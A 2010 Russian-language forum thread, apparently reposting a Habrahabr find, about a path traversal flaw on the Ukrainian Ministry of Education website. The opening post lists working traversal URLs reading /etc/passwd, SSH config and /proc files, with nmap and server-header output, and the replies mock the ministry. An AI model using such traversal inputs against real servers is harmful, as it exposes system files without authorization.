Сайт Министерства образования и науки Украины...дырявый? |
Привіт Гість ( Вхід | Реєстрація )
Сайт Министерства образования и науки Украины...дырявый? |
Khvastov Maxim |
Apr 9 2010, 14:26
Пост
#1
|
Система раннього сповiщення Група: Trusted Members Повідомлень: 1 008 З нами з: 29-January 09 З: Донецьк Користувач №: 915 Стать: Чол |
Министерство образования и науки Украины… Образование 2.0 говорите?
Сегодня товарищи поделились интересной ссылкой * www.mon.gov.ua/main.php?query=../../../etc/passwd Стало интересно глянуть, а чего там открыто? Бесхитростно: $ nmap www.mon.gov.ua Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2010-04-09 10:40 EEST Interesting ports on 212.111.193.189: Not shown: 1679 filtered ports PORT STATE SERVICE 80/tcp open http Nmap finished: 1 IP address (1 host up) scanned in 76.253 seconds Что-ж… Тоже вариант… 80 порт и только… Жаль… $ w3m -dump_head www.mon.gov.ua HTTP/1.1 200 OK Date: Fri, 09 Apr 2010 07:43:50 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Ну тогда стал прорезаться просто исследовательский азарт: * www.mon.gov.ua/main.php?query=../../../etc/rc * www.mon.gov.ua/main.php?query=../../../etc/rc.local * www.mon.gov.ua/main.php?query=../../../etc/ssh/ssh_config * www.mon.gov.ua/main.php?query=../../../proc/cpuinfo * www.mon.gov.ua/main.php?query=../../../proc/meminfo http://habrahabr.ru/blogs/infosecurity/90473/ |
tiss |
Apr 9 2010, 16:06
Пост
#2
|
Мега ранчер Група: Trusted Members Повідомлень: 1 640 З нами з: 28-February 09 Користувач №: 952 Стать: Чол Free-DC_CPID |
ппц ребята - какой министр, такой и сайт
-------------------- |
Alien |
Apr 9 2010, 16:13
Пост
#3
|
Разработчик MolDynGrid Група: Trusted Members Повідомлень: 569 З нами з: 7-October 07 Користувач №: 594 Стать: Чол Парк машин: Q6600 2.4@3.0GHz\Asus p5kc\8Gb\8600GT\2 SATA: Sams 500Gb+ 500Gb + Seagate 400Gb |
QUOTE Потом уже глянул, что этой дыре «в обед сто лет». какие министрЫ -------------------- |
Lo-Fi Версія | Поточний час: 21st September 2024 - 00:01 |